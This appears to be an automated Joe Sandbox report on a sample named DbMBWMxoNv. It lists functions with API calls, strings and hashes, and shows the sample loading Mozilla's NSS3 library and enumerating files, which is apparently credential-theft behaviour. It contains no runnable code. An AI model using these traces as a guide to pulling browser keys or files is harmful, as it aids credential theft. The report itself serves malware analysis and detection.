Opcode Fuzzy Hash: 4258c76c4f47740e30e0af574e778a78e5a168a413d5b1b985f8475468444836
Instruction Fuzzy Hash: 3901E434904108EBCB15DF98C595BEDBBB1AF08308F24809AE9056B381C379AE84EF49

Function 00409910 Relevance: 1.3, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT(00000020,004108B9,?,?), ref: 00409918

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: ??2@
String ID:
API String ID: 1033339047-0
Opcode ID: 3912ae89892860816b228f59aaf213fb868172a610b0e449912dea322eeca367
Instruction ID: 7a81cf42230454625edcc1d807e760a9f48c6c1e1b7ee97c20b10c4417f739aa
Opcode Fuzzy Hash: 3912ae89892860816b228f59aaf213fb868172a610b0e449912dea322eeca367
Instruction Fuzzy Hash: F3F054B4D00208FBDB00EFA5C846B9EBBB49B08304F1085A9F905A7381E674AB14CB95

Non-executed Functions

Function 6CF56E90 Relevance: 142.5, APIs: 71, Strings: 10, Instructions: 783stringmemoryCOMMON

Download Yara Rule

APIs

PR_CallOnce.NSS3(6D0A2120,6CF57E60), ref: 6CF56EBC
TlsGetValue.KERNEL32 ref: 6CF56EDF
EnterCriticalSection.KERNEL32(?), ref: 6CF56EF3
PR_WaitCondVar.NSS3(000000FF), ref: 6CF56F25

Part of subcall function 6CF2A900: TlsGetValue.KERNEL32(00000000,?,6D0A14E4,?,6CEC4DD9), ref: 6CF2A90F
Part of subcall function 6CF2A900: _PR_MD_WAIT_CV.NSS3(?,?,?), ref: 6CF2A94F

PR_Unlock.NSS3 ref: 6CF56F68
PORT_ZAlloc_Util.NSS3(00000008), ref: 6CF56FA9
TlsGetValue.KERNEL32 ref: 6CF570B4
EnterCriticalSection.KERNEL32(?), ref: 6CF570C8
PR_CallOnce.NSS3(6D0A24C0,6CF97590), ref: 6CF57104
PR_SetError.NSS3(FFFFE013,00000000), ref: 6CF57117
SECOID_Init.NSS3 ref: 6CF57128
PORT_Alloc_Util.NSS3(00000057), ref: 6CF5714E
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CF5717F
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CF571A9
PR_NotifyAllCondVar.NSS3 ref: 6CF571CF
PR_Unlock.NSS3 ref: 6CF571DD
free.MOZGLUE(?), ref: 6CF571EE
PR_SetError.NSS3(FFFFE013,00000000), ref: 6CF57208
free.MOZGLUE(00000000), ref: 6CF57221
free.MOZGLUE(00000001), ref: 6CF57235
TlsGetValue.KERNEL32 ref: 6CF5724A
EnterCriticalSection.KERNEL32(?), ref: 6CF5725E
PR_NotifyCondVar.NSS3 ref: 6CF57273
PR_Unlock.NSS3 ref: 6CF57281
SECMOD_DestroyModule.NSS3(00000000), ref: 6CF57291
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CF572B1
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CF572D4
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CF572E3
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CF57301
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CF57310
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CF57335
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CF57344
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CF57363
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CF57372
PR_smprintf.NSS3(name="%s" parameters="configdir='%s' certPrefix='%s' keyPrefix='%s' secmod='%s' flags=%s updatedir='%s' updateCertPrefix='%s' updateKeyPrefix='%s' updateid='%s' updateTokenDescription='%s' %s" NSS="flags=internal,moduleDB,moduleDBOnly,critical%s",NSS Internal Module,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,6D090148,,defaultModDB,internalKeySlot), ref: 6CF574CC
free.MOZGLUE(00000000), ref: 6CF57513
free.MOZGLUE(00000000), ref: 6CF5751B
free.MOZGLUE(00000000), ref: 6CF57528
free.MOZGLUE(00000000), ref: 6CF5753C
free.MOZGLUE(00000000), ref: 6CF57550
free.MOZGLUE(00000000), ref: 6CF57561
free.MOZGLUE(00000000), ref: 6CF57572
free.MOZGLUE(00000000), ref: 6CF57583
free.MOZGLUE(00000000), ref: 6CF57594
free.MOZGLUE(00000000), ref: 6CF575A2
SECMOD_LoadModule.NSS3(00000000,00000000,00000001), ref: 6CF575BD
free.MOZGLUE(00000000), ref: 6CF575C8
free.MOZGLUE(00000000), ref: 6CF575F1
PR_NewLock.NSS3 ref: 6CF57636
SECMOD_DestroyModule.NSS3(00000000), ref: 6CF57686
PR_NewLock.NSS3 ref: 6CF576A2

Part of subcall function 6D0098D0: calloc.MOZGLUE(00000001,00000084,6CF30936,00000001,?,6CF3102C), ref: 6D0098E5

PORT_ZAlloc_Util.NSS3(00000050), ref: 6CF576B6
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sql:,00000004), ref: 6CF57707
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,dbm:,00000004), ref: 6CF5771C
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,extern:,00000007), ref: 6CF57731
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,rdb:,00000004), ref: 6CF5774A
DeleteCriticalSection.KERNEL32(?), ref: 6CF57770
free.MOZGLUE(?), ref: 6CF57779
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CF5779A
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CF577AC
PORT_Alloc_Util.NSS3(-0000000D), ref: 6CF577C4
memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6CF577DB
strrchr.VCRUNTIME140(?,0000002F), ref: 6CF57821
PORT_Alloc_Util.NSS3(?), ref: 6CF57837
memcpy.VCRUNTIME140(00000000,00000000,00000000), ref: 6CF5785B
memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6CF5786F
SECMOD_AddNewModuleEx.NSS3 ref: 6CF578AC
free.MOZGLUE(00000000), ref: 6CF578BE
SECMOD_AddNewModuleEx.NSS3 ref: 6CF578F3
free.MOZGLUE(00000000), ref: 6CF578FC
free.MOZGLUE(00000000), ref: 6CF5791C

Part of subcall function 6CF307A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6CEC204A), ref: 6CF307AD
Part of subcall function 6CF307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CEC204A), ref: 6CF307CD
Part of subcall function 6CF307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CEC204A), ref: 6CF307D6
Part of subcall function 6CF307A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6CEC204A), ref: 6CF307E4
Part of subcall function 6CF307A0: TlsSetValue.KERNEL32(00000000,?,6CEC204A), ref: 6CF30864
Part of subcall function 6CF307A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CF30880
Part of subcall function 6CF307A0: TlsSetValue.KERNEL32(00000000,?,?,6CEC204A), ref: 6CF308CB
Part of subcall function 6CF307A0: TlsGetValue.KERNEL32(?,?,6CEC204A), ref: 6CF308D7
Part of subcall function 6CF307A0: TlsGetValue.KERNEL32(?,?,6CEC204A), ref: 6CF308FB

Strings

kbi., xrefs: 6CF57886
rdb:, xrefs: 6CF57744
sql:, xrefs: 6CF576FE
dll, xrefs: 6CF5788E
dbm:, xrefs: 6CF57716
,defaultModDB,internalKeySlot, xrefs: 6CF5748D, 6CF574AA
extern:, xrefs: 6CF5772B
NSS Internal Module, xrefs: 6CF574A2, 6CF574C6
Spac, xrefs: 6CF57389
name="%s" parameters="configdir='%s' certPrefix='%s' keyPrefix='%s' secmod='%s' flags=%s updatedir='%s' updateCertPrefix='%s' updateKeyPrefix='%s' updateid='%s' updateTokenDescription='%s' %s" NSS="flags=internal,moduleDB,moduleDBOnly,critical%s", xrefs: 6CF574C7

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: free$strlen$Value$Alloc_ModuleUtil$CriticalSectionstrncmp$CondEnterUnlockcallocmemcpy$CallDestroyErrorLockNotifyOnce$DeleteInitLoadR_smprintfWaitstrrchr
String ID: ,defaultModDB,internalKeySlot$NSS Internal Module$Spac$dbm:$dll$extern:$kbi.$name="%s" parameters="configdir='%s' certPrefix='%s' keyPrefix='%s' secmod='%s' flags=%s updatedir='%s' updateCertPrefix='%s' updateKeyPrefix='%s' updateid='%s' updateTokenDescription='%s' %s" NSS="flags=internal,moduleDB,moduleDBOnly,critical%s"$rdb:$sql:
API String ID: 3465160547-3797173233
Opcode ID: d1b3ab2ba0b5743e74f6cfe1e150a2c127fa97c202dac7205feb15bb086d2f08
Instruction ID: b1f4302b838eae7fe5723360f9d498d82387bc9ee3e1d66e1da5e1dc8ba6adb0
Opcode Fuzzy Hash: d1b3ab2ba0b5743e74f6cfe1e150a2c127fa97c202dac7205feb15bb086d2f08
Instruction Fuzzy Hash: B55233B1D11205DBEF208F65DC04BAE7BB4BF25308F54802AEE09A7742E771D964CB92

Function 6CF66D90 Relevance: 60.3, APIs: 33, Strings: 1, Instructions: 809COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,6D06A8EC,0000006C), ref: 6CF66DC6
memcpy.VCRUNTIME140(?,6D06A958,0000006C), ref: 6CF66DDB
memcpy.VCRUNTIME140(?,6D06A9C4,00000078), ref: 6CF66DF1
memcpy.VCRUNTIME140(?,6D06AA3C,0000006C), ref: 6CF66E06
memcpy.VCRUNTIME140(?,6D06AAA8,00000060), ref: 6CF66E1C
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CF66E38

Part of subcall function 6CFEC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CFEC2BF

PK11_DoesMechanism.NSS3(?,?), ref: 6CF66E76
TlsGetValue.KERNEL32 ref: 6CF6726F
EnterCriticalSection.KERNEL32(?), ref: 6CF67283

Strings

!, xrefs: 6CF67123

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: memcpy$Value$CriticalDoesEnterErrorK11_MechanismSection
String ID: !
API String ID: 3333340300-2657877971
Opcode ID: 2a097d41180d5ed5c89a12dc14bb7b86f44d20e523d4b7314f4670f615378a01
Instruction ID: b435ec2798d0d145caa9a07173baa21a372873a1d447a11a87c5ae5a218b4a3a
Opcode Fuzzy Hash: 2a097d41180d5ed5c89a12dc14bb7b86f44d20e523d4b7314f4670f615378a01
Instruction Fuzzy Hash: C77280B5D052199FDF60CF29CC88B9ABBB5BF49304F1441AAE80DA7741E7319A84CF91

Function 6CED3C40 Relevance: 41.2, APIs: 20, Strings: 3, Instructions: 932COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CED3C66
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(000000FD,?), ref: 6CED3D04
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CED3EAD
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CED3ED7
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CED3F74
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CED4052
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CED406F
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000001), ref: 6CED410D
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00011A47,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CED449C

Strings

%s at line %d of [%.10s], xrefs: 6CED4495, 6CED44F9, 6CED459E, 6CED4769, 6CED4809
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CED4452, 6CED4486, 6CED44EA, 6CED4571, 6CED4580, 6CED458F, 6CED475A, 6CED47FA
database corruption, xrefs: 6CED4490, 6CED44F4, 6CED4599, 6CED4764, 6CED4804

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: _byteswap_ulong$sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 2597148001-598938438
Opcode ID: bed6ab1f022eda61a016ebaf87bdb04a99cd5fc78d401eab6b5ae90989772c13
Instruction ID: 6c6ef03e4c1cecb8a202cccd9135b25d062eed9c28451409429328438f94308c
Opcode Fuzzy Hash: bed6ab1f022eda61a016ebaf87bdb04a99cd5fc78d401eab6b5ae90989772c13
Instruction Fuzzy Hash: 0C827C75A042059FDB04CF68C580B9AB7B2BF59318F3681AAD909AB752D731FC43CB91

Function 6CFAAC30 Relevance: 39.5, APIs: 26, Instructions: 539memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?), ref: 6CFAACC4
PORT_ArenaAlloc_Util.NSS3(?,000040F4), ref: 6CFAACD5
memset.VCRUNTIME140(00000000,00000000,000040F4), ref: 6CFAACF3
SEC_ASN1EncodeInteger_Util.NSS3(?,00000018,00000003), ref: 6CFAAD3B
SECITEM_CopyItem_Util.NSS3(?,?,00000000), ref: 6CFAADC8
PR_SetError.NSS3(FFFFE013,00000000), ref: 6CFAADDF
PR_SetError.NSS3(FFFFE013,00000000), ref: 6CFAADF0

Part of subcall function 6CFEC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CFEC2BF

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CFAB06A
PR_SetError.NSS3(FFFFE013,00000000), ref: 6CFAB08C
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CFAB1BA
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CFAB27C
memset.VCRUNTIME140(?,00000000,00002010), ref: 6CFAB2CA
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CFAB3C1
PR_SetError.NSS3(FFFFE013,00000000), ref: 6CFAB40C

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: Util$Error$Arena_Free$ArenaItem_memset$Alloc_CopyEncodeInteger_Mark_ValueZfree
String ID:
API String ID: 1285963562-0
Opcode ID: 575b1d09e05ed4eaa9f2cae6c8147658e99c4e0b9d25d8b6d5dd68b42bedae42
Instruction ID: 2ee3e082025b7e338482feeb06c7c58522a6a3ffb6ebda75e2ef7eaa3e10ffeb
Opcode Fuzzy Hash: 575b1d09e05ed4eaa9f2cae6c8147658e99c4e0b9d25d8b6d5dd68b42bedae42
Instruction Fuzzy Hash: 8022B171904301EFE710CF55CC44B9AB7E1AF84308F24896CE8595F7A2E772E85ACB96

Function 6CF2ECD0 Relevance: 33.8, APIs: 7, Strings: 12, Instructions: 539COMMON

Download Yara Rule

APIs

sqlite3_initialize.NSS3 ref: 6CF2ED38

Part of subcall function 6CEC4F60: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CEC4FC4

sqlite3_mprintf.NSS3(snippet), ref: 6CF2EF3C
sqlite3_mprintf.NSS3(offsets), ref: 6CF2EFE4

Part of subcall function 6CFEDFC0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,00000003,?,6CEC5001,?,00000003,00000000), ref: 6CFEDFD7

sqlite3_mprintf.NSS3(matchinfo), ref: 6CF2F087
sqlite3_mprintf.NSS3(matchinfo), ref: 6CF2F129
sqlite3_mprintf.NSS3(optimize), ref: 6CF2F1D1
sqlite3_free.NSS3(?), ref: 6CF2F368

Strings

fts4aux, xrefs: 6CF2ECF9
fts4, xrefs: 6CF2F2AD
simple, xrefs: 6CF2ED79
unicode61, xrefs: 6CF2EDB5
porter, xrefs: 6CF2ED97
fts3tokenize, xrefs: 6CF2F30F
optimize, xrefs: 6CF2F199, 6CF2F1CC, 6CF2F211
matchinfo, xrefs: 6CF2F04F, 6CF2F082, 6CF2F0C2, 6CF2F0F2, 6CF2F124, 6CF2F169
fts3_tokenizer, xrefs: 6CF2EE1A, 6CF2EEA8
snippet, xrefs: 6CF2EF05, 6CF2EF37, 6CF2EF7C
fts3, xrefs: 6CF2F247
offsets, xrefs: 6CF2EFAF, 6CF2EFDF, 6CF2F01F

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: sqlite3_mprintf$strlen$sqlite3_freesqlite3_initialize
String ID: fts3$fts3_tokenizer$fts3tokenize$fts4$fts4aux$matchinfo$offsets$optimize$porter$simple$snippet$unicode61
API String ID: 2518200370-449611708
Opcode ID: e981e77fcee5152d57872cf4cfc08f2289e60d2d15e7fb8980d4954f5bdcfb2a
Instruction ID: bd9ac1a5188b8e20a56ff7987ccf7bdfee483d477c7ec4bc09a2acc96e0459c3
Opcode Fuzzy Hash: e981e77fcee5152d57872cf4cfc08f2289e60d2d15e7fb8980d4954f5bdcfb2a
Instruction Fuzzy Hash: 260223B6A147109BE7049FB19C8572F32B1BFC970CF28453CD85A8B741EB79E8468792

Function 6CFA7C00 Relevance: 31.9, APIs: 21, Instructions: 421COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6CFA7C33
NSS_OptionGet.NSS3(0000000C,00000000), ref: 6CFA7C66
CERT_DestroyCertificate.NSS3(00000000), ref: 6CFA7D1E

Part of subcall function 6CFA7870: SECOID_FindOID_Util.NSS3(?,?,?,6CFA91C5), ref: 6CFA788F

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CFA7D48
PR_SetError.NSS3(FFFFE067,00000000), ref: 6CFA7D71
SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6CFA7DD3
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CFA7DE1
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CFA7DF8
SECKEY_DestroyPublicKey.NSS3(?), ref: 6CFA7E1A
PR_SetError.NSS3(FFFFE067,00000000), ref: 6CFA7E58

Part of subcall function 6CFA7870: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CFA91C5), ref: 6CFA78BB
Part of subcall function 6CFA7870: PORT_ZAlloc_Util.NSS3(0000000C,?,?,?,6CFA91C5), ref: 6CFA78FA
Part of subcall function 6CFA7870: strchr.VCRUNTIME140(?,0000003A,?,?,?,?,?,?,?,?,?,?,6CFA91C5), ref: 6CFA7930
Part of subcall function 6CFA7870: PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6CFA91C5), ref: 6CFA7951
Part of subcall function 6CFA7870: memcpy.VCRUNTIME140(00000000,?,?), ref: 6CFA7964
Part of subcall function 6CFA7870: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6CFA797A
Part of subcall function 6CFA7870: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000001), ref: 6CFA7988
Part of subcall function 6CFA7870: memcpy.VCRUNTIME140(?,00000001,00000001), ref: 6CFA7998
Part of subcall function 6CFA7870: free.MOZGLUE(00000000), ref: 6CFA79A7
Part of subcall function 6CFA7870: SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,?,?,6CFA91C5), ref: 6CFA79BB
Part of subcall function 6CFA7870: PR_GetCurrentThread.NSS3(?,?,?,?,6CFA91C5), ref: 6CFA79CA

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CFA7E49
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CFA7F8C
SECKEY_DestroyPublicKey.NSS3(?), ref: 6CFA7F98
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CFA7FBF
SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6CFA7FD9
PK11_ImportEncryptedPrivateKeyInfoAndReturnKey.NSS3(?,00000000,?,?,?,00000001,00000001,?,?,00000000,?), ref: 6CFA8038
SECITEM_ZfreeItem_Util.NSS3(00000000,00000000), ref: 6CFA8050
PK11_ImportPublicKey.NSS3(?,?,00000001), ref: 6CFA8093
SECOID_FindOID_Util.NSS3 ref: 6CFA7F29

Part of subcall function 6CFA07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6CF48298,?,?,?,6CF3FCE5,?), ref: 6CFA07BF
Part of subcall function 6CFA07B0: PL_HashTableLookup.NSS3(?,?), ref: 6CFA07E6
Part of subcall function 6CFA07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CFA081B
Part of subcall function 6CFA07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CFA0825

SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6CFA8072
SECOID_FindOID_Util.NSS3 ref: 6CFA80F5

Part of subcall function 6CFABC10: SECITEM_CopyItem_Util.NSS3(?,?,?,?,-00000001,?,6CFA800A,00000000,?,00000000,?), ref: 6CFABC3F

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: Util$Item_$Error$Zfree$DestroyPublic$Find$Alloc_CopyHashImportK11_LookupTablememcpy$AlgorithmCertificateConstCurrentEncryptedInfoOptionPrivateReturnTag_Threadfreestrchrstrcmpstrlen
String ID:
API String ID: 2815116071-0
Opcode ID: c14f259e126a693df15edbe663fb1a0f459b7a30d6bcbc38b12e89a6e9936d7d
Instruction ID: 8261a21e8262beefed1ec4b8d85c458358bff7c48206fe03c601b44c2d9e74ab
Opcode Fuzzy Hash: c14f259e126a693df15edbe663fb1a0f459b7a30d6bcbc38b12e89a6e9936d7d
Instruction Fuzzy Hash: 07E17F71608300DFE710CF69C880F5BB7E5AF48308F14496EE99A9BB55E771E816CB92

Function 004147C0 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,0098967F), ref: 004147D0
HeapAlloc.KERNEL32(00000000), ref: 004147D7
wsprintfA.USER32 ref: 004147F6
FindFirstFileA.KERNEL32(?,?), ref: 0041480D
StrCmpCA.SHLWAPI(?,00420FAC), ref: 0041483B
StrCmpCA.SHLWAPI(?,00420FB0), ref: 00414851
FindNextFileA.KERNEL32(000000FF,?), ref: 004148DB
FindClose.KERNEL32(000000FF), ref: 004148F0
lstrcatA.KERNEL32(?,02D27088,?,00000104), ref: 00414915
lstrcatA.KERNEL32(?,02D26158), ref: 00414928
lstrlenA.KERNEL32(?), ref: 00414935
lstrlenA.KERNEL32(?), ref: 00414946

Strings

%s\%s, xrefs: 0041486B
%s\*, xrefs: 004147EA

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
